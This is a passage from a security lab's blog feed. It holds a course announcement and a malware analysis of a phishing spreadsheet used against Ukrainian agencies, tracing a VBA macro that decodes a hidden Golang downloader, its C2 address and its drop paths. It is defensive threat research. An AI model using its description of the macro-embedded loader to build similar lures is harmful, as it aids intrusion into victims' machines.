tag:blogger.com,1999:blog-44824046275416108192024-03-13T01:16:14.303-07:00NioGuard Security LabNioGuard Security Lab brings together experts from industry and academia to conduct advanced anti-malware research and cybersecurity education.Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.comBlogger42125tag:blogger.com,1999:blog-4482404627541610819.post-69695322550157650582022-10-01T04:15:00.001-07:002022-10-01T04:15:23.360-07:00"Analysis of cyberweapons" course<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbPQ6czNBb5qGjNAjVPZvcsKijToTK_-9ZbaXQxR0IMNjv_GKQNFBYvPuuHhMZ-YS7pFJRRo31CuGmzvVmB-aT5mWfXBzcnJ3JPFc5xyGCOT_7jGqS04wPaxQAhEzFLWppilr0gD99NCANEadwUu_w4QEXILVSFztVX641uAee9hIDVWts2Kl_e7FJGA/s1920/Ep1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbPQ6czNBb5qGjNAjVPZvcsKijToTK_-9ZbaXQxR0IMNjv_GKQNFBYvPuuHhMZ-YS7pFJRRo31CuGmzvVmB-aT5mWfXBzcnJ3JPFc5xyGCOT_7jGqS04wPaxQAhEzFLWppilr0gD99NCANEadwUu_w4QEXILVSFztVX641uAee9hIDVWts2Kl_e7FJGA/w640-h360/Ep1.jpg" width="640" /></a></div><br /><div>I got requests from my colleagues from the US and EU universities to come up with the "Analysis of cyberweapons" course in English. In the first video, I start the series devoted to the analysis of the Russian cyberweapons used in the Russia-Ukraine war. </div><div><br /></div><div>The lessons will be published on my Patreon (<a href="https://www.patreon.com/alexanderadamov">https://www.patreon.com/alexanderadamov</a>) and YouTube channel (<a href="https://www.youtube.com/c/MalwareResearchAcademy">https://www.youtube.com/c/MalwareResearchAcademy</a>)</div><div><br /></div><div>For Ukrainians:</div><div>- Telegram channel (UA): <a href="https://t.me/malwareanalysisinua">https://t.me/malwareanalysisinua</a><br />- Youtube channel (UA): <a href="https://www.youtube.com/channel/UCqquOw2m2QF_EjcyxVwIYyQ">https://www.youtube.com/channel/UCqquOw2m2QF_EjcyxVwIYyQ</a></div>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-64494203173759551492022-04-04T03:22:00.004-07:002022-04-04T03:22:39.111-07:00Russian SaintBear Group Attacked Ukrainian Government Agencies Using GraphSteel & GrimPlant malware<p> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhvWgXYtY3JH5BdTNmom7-rvko6vkhWugLiP2eA3IuEA-i3A9Wcypf_hhdlxxDHXugQa_5zFhs9j33SauATJOjl3SX-RTTkCjPEYrCmm4HlwGmVOvv1e9c2eSO3u8jMHeccqXzHQHmc2KkfeuG_vgcH_5c46gHmVQ57XJJQoYfgIV93whgouloQoFvXvw" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img data-original-height="854" data-original-width="1362" height="402" src="https://blogger.googleusercontent.com/img/a/AVvXsEhvWgXYtY3JH5BdTNmom7-rvko6vkhWugLiP2eA3IuEA-i3A9Wcypf_hhdlxxDHXugQa_5zFhs9j33SauATJOjl3SX-RTTkCjPEYrCmm4HlwGmVOvv1e9c2eSO3u8jMHeccqXzHQHmc2KkfeuG_vgcH_5c46gHmVQ57XJJQoYfgIV93whgouloQoFvXvw=w640-h402" width="640" /></a></p><span id="docs-internal-guid-bbaf94c8-7fff-a265-4d70-5bb00f64e59d"><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Summary</span></h2><br /><ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Name: ‘Заборгованість по зарплаті.xls’</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovered in March 2022</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Was used in attacks against Ukrainian government agencies</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Used to download GraphSteel and GrimPlant (a.k.a. Elephant) malware</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Spreads via phishing emails as ‘.xls’ file with malicious VisualBasic script</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">‘.xls’ file contains the encoded payload</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Extracted file has PE64 format and written in Golang, downloads one file from the remote server</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The downloaded file is PE64 and written in Golang. It downloads GraphSteel and GrimPlant malware.</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The attack has been attributed to </span><span style="font-size: 11pt;">UAC-0056 also known as SaintBear, UNC2589, and TA471 which is known to attack Ukraine and Georgia since 2021.</span><span style="font-size: 11pt;"> </span></p></li></ul><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><span><a name='more'></a></span>Introduction</span></h2><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">On the 28th of March 2022, the Ukrainian agency CERT-UA published an </span><a href="https://cert.gov.ua/article/38374" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">article</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> with information about the new malware that was used to attack government state agencies. This campaign doesn’t match with any previous attacks since Russia invaded Ukraine. Two threats called GraphSteel and GrimPland, linked to the <i>UAC-0056</i> group, come to the victim’s machines via email attachments. The messages contain ‘<i>Заборгованість по зарплаті.xls</i>’(eng:’Salary arrears’) file, that will execute a malicious Visual Basic script as soon as the victim will open this file. This script will extract a PE64 file which will download <i>GraphSteel </i>and <i>GrimPlant</i> (a.k.a. Elephant ) malware.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhdP0FslFyKosLJHu83vSUgSaTB88ucanQ8ct9dAdJwm9-a_bzBKxoHuTEXsYaiBoinE8cU6SVGPMDySmd-hpSeGJI6dt683_mzv3opxInl9m7C5zdw-PFDR8nA-mDruuDpK9TDJfFf9ObwLlNgUSUvzhczWtGKrH2Ev8nZaapnYDhbP9w5CNjQ8zdqjA" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="348" data-original-width="609" src="https://blogger.googleusercontent.com/img/a/AVvXsEhdP0FslFyKosLJHu83vSUgSaTB88ucanQ8ct9dAdJwm9-a_bzBKxoHuTEXsYaiBoinE8cU6SVGPMDySmd-hpSeGJI6dt683_mzv3opxInl9m7C5zdw-PFDR8nA-mDruuDpK9TDJfFf9ObwLlNgUSUvzhczWtGKrH2Ev8nZaapnYDhbP9w5CNjQ8zdqjA=s16000" /></a></div></span><p></p><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Technical Details</span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Overview</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">At first sight, the spreadsheet contains valid data with the amount of salaries arrears in the Ukrainian regions on ‘21.02.2022’. It contains multiple sheets that can be edited because the file is not protected with the password (which is often used in malicious documents). </span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">We can take a quick look if the file contains any macros with the ‘olevba’ tool.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 517px; overflow: hidden; width: 582px;"><img height="517" src="https://lh3.googleusercontent.com/5nXfa8mLrZz2B8FCji9fG6F7obWwjh801KS-y7RTRQh3xyXmq8tItvfx2LEvP2bUmTc0z-GB3q35xeMMzZNpJdXoTXc0cKjqZzYxuhBYKqEloFNSFISFHUHNeHrWtYvCBOO_Tj64" style="margin-left: 0px; margin-top: 0px;" width="582" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The script contains </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">‘http://ExcelVBA.ru/’ </span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">and </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">‘http://ExcelVBA.ru/payments’ </span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">URLs, but during execution, it doesn't connect to them, they are stored in comments.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 124px; overflow: hidden; width: 624px;"><img height="124" src="https://lh5.googleusercontent.com/ZSOX3GzdpjOEcW0rrLPyk1MX_CXDTTpN6LSW5X8Pe72Rr5uW3Z_4ejcEAygczKbDD3QaQ4w2pzhyJzQ9SPJFBoW0r0KWtaqfH5fVQzfM2-yMn-f9xNlPKU4I2jB-XgiWhjVckVxJ" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This site is a service for selling VBA scripts.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 349px; overflow: hidden; width: 503px;"><img height="349" src="https://lh4.googleusercontent.com/sTg0b0RD_p8rKlsneanIK55vUe7mgSpvToFWuoKUqW9WeX83ByVF2mAXIR8ie77jKHvdK9EFRF_U3glScL67nSFNk6Rx95qf89ovW2VXTUt7Hste-Wl5boNF5r_XN0Mn8NJsgvNc" style="margin-left: 0px; margin-top: 0px;" width="503" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">It has some free solutions, one of them is a file loader and file extractor from the workbook and it completely matches with the script, which was used to unpack the malware downloader, even comments were not deleted. This approach looks like this attack wasn’t prepared in advance, but was carried out quickly.</span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Malicious VisualBasic script execution</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Once a victim opens a workbook, the VisualBasic script will be executed. This script can be obtained in an easy way, just open the VBA panel in Microsoft Excel. One of the sheets contains an encoded payload in “AB37” range.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 212px; overflow: hidden; width: 624px;"><img height="212" src="https://lh5.googleusercontent.com/9aQfSoO20ttmOagFardAwIURo4uFpFqJ1Le6u2iZUvDOve-B25_JwZlwzZ1bndBrNTYjMT6ZgIbb_B7Z2MPUOAETo5UhS4IqZEJPM31aUSEjVyfSiCMbTAmbn_6k4oeEZAX_-Wbk" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">To extract the payload script contains the ‘SaveAs()’ function which calls the decoding function and saves the file to the ‘%Temp’ folder. </span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 564px; overflow: hidden; width: 624px;"><img height="564" src="https://lh3.googleusercontent.com/3TIVDxZNiGlIaP8VDgY0JVoueXRzof4nGGnQynvTYM4r2Lz8GTMTIwp5g-kMKjWijm7x0f4-B_BDN_vRH7dQd1IF3udB70rRHPjC7V-7hblPQirCcZVU2OWaViLCfjkxMf_DXKFu" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The decoding function ‘Range2Text’ extracts data from range, specified in ‘ОбновлениеБазы()’ function.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 288px; overflow: hidden; width: 624px;"><img height="288" src="https://lh5.googleusercontent.com/8bcQa0x9NhKSKHA66NBKVrSwhOeHMM4oDi8XBHQBtqEWzix_1hJo6pZhgCLgb4VnwZXm3gs-EjAqD2-Y9mPHXJrwK5XOd5T7JhtzH35GXsolvs0OIuGfaHpOz4cCXtYrIGHcHn_F" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After the payload is extracted it will be executed.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 110px; overflow: hidden; width: 591px;"><img height="110" src="https://lh3.googleusercontent.com/_HilgV2BC7ETaKcReCgl8yXHpYV0m6kgLHCOzj-kQPfjbror8HQMIuLMJnd4-Pu2BW_aqBAs1xkCwjT10Nz451_6nQ1UG1y-yneK7RsrorrkSHQFmrBKeCMch2aFxVCwRIdTw3BJ" style="margin-left: 0px; margin-top: 0px;" width="591" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Besides the file extraction function, this script has functions to load files in the worksheet. The function ‘LoadFileData’ reads the file and converts its data into an array with the ‘FileToArray’ function. Then it obtains the range in the worksheet where it was saved and changes the size of the cell, where it must be saved. This range can be further used in the extraction function.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 255px; overflow: hidden; width: 409px;"><img height="255" src="https://lh5.googleusercontent.com/G5B_nzYOV5DHFYfRIrFAi6peM6XD_mXU08eCl40e8nGwu3mo_jggIm-KKEvludYQ5tC_wqKLbsNksHrskL22dY3SxJkQw5X8pi_ixdDzW6RTs075jponW_BTJJjiYC7cLddDY-8T" style="margin-left: 0px; margin-top: 0px;" width="409" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 332px; overflow: hidden; width: 576px;"><img height="332" src="https://lh4.googleusercontent.com/_EeAkYfFe50J1pQ7kHMWBFzwKMkzgvGzaQqfTPKLvGVkw0cq9RPzzGwfFV9nCrULTWoVPEN2dbBSqUdHeQkZ1sDCifMrR4onK-JZNZlNvbsKdtCmEtQ7_q-LJH1DWxf1CQfPa3Rt" style="margin-left: 0px; margin-top: 0px;" width="576" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 92px; overflow: hidden; width: 554px;"><img height="92" src="https://lh4.googleusercontent.com/L8jyU_GZdzj4AagUQH4zRu4eP5rlT9dR0PIHG_e6WuwYsXTOpwuYeERBSxrDF6fZUbjOiqOiIQHG2RqlTR56wsuWxU-qy6m-6Ab_ml1ctX0APYOrNRdxf1rGQZTeXt8gCl_ONNWl" style="margin-left: 0px; margin-top: 0px;" width="554" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The code of </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Base-Update.exe</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> is embedded into the hidden tab.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 393px; overflow: hidden; width: 624px;"><img height="393" src="https://lh5.googleusercontent.com/xKx7bWkNS6mlo53UVeRk--5n0hHTDB3hejLKibCTi7nwMGbw1Rdeg5CiHjWKFnO_3UXMzPsYAvw4n5pdyP-nU-l8yoQLUEATsXNpdx3hWp0iI2gdAu6KB7qnPwvCCY7A8Cz1_7JP" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span id="docs-internal-guid-d1624fe7-7fff-b1cc-aa81-2f56af4f70da"><br /></span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Payload</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The decoded file (Base-Update.exe) is a PE64 file written in Golang and known as </span><span style="font-family: Arial; font-size: 11pt; text-align: left; white-space: pre-wrap;">Elephant Downloader or GoDownloader</span><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">. It has an invalid Microsoft certificate attached.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 317px; overflow: hidden; width: 264px;"><img height="317" src="https://lh4.googleusercontent.com/t6g6qyZa71S3rA3N8VEtrt_FS9PilTrgsUiyStzKayFjzD2DMTg4MHHA_A-GBtV244rjpuon9Sbp2XBwAszllrOIj1Gl3CcTx2nwfoAlXgwjTqNdAUAh0xNpiYRfRpcUa6QYkunQ" style="margin-left: 0px; margin-top: 0px;" width="264" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Once executed, this file connects to the ‘194.31.98.124:443' IP address in the United States to download and drop another file ‘java-sdk.exe’ in the ‘C:\Users\User\.java-sdk’ folder. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 291px; overflow: hidden; width: 624px;"><img height="291" src="https://lh6.googleusercontent.com/O8VJ8xmGe_ds_gCDjCpsbp_jEwdFELXdl1LEiU6TH_sHsxPsqLUEK3zFpcCwE4qQy9uo5fucCNJ8dN1DOcE4iEowW55--4X-92ZFm4BGMJ0Crlz-uTXk_-KIvMx4pM7hrrbp1qno" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Dropped file is also a PE64 file and written in Golang, but it doesn’t have any digital signatures. It is a Trojan-Downloader too.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 352px; overflow: hidden; width: 247px;"><img height="352" 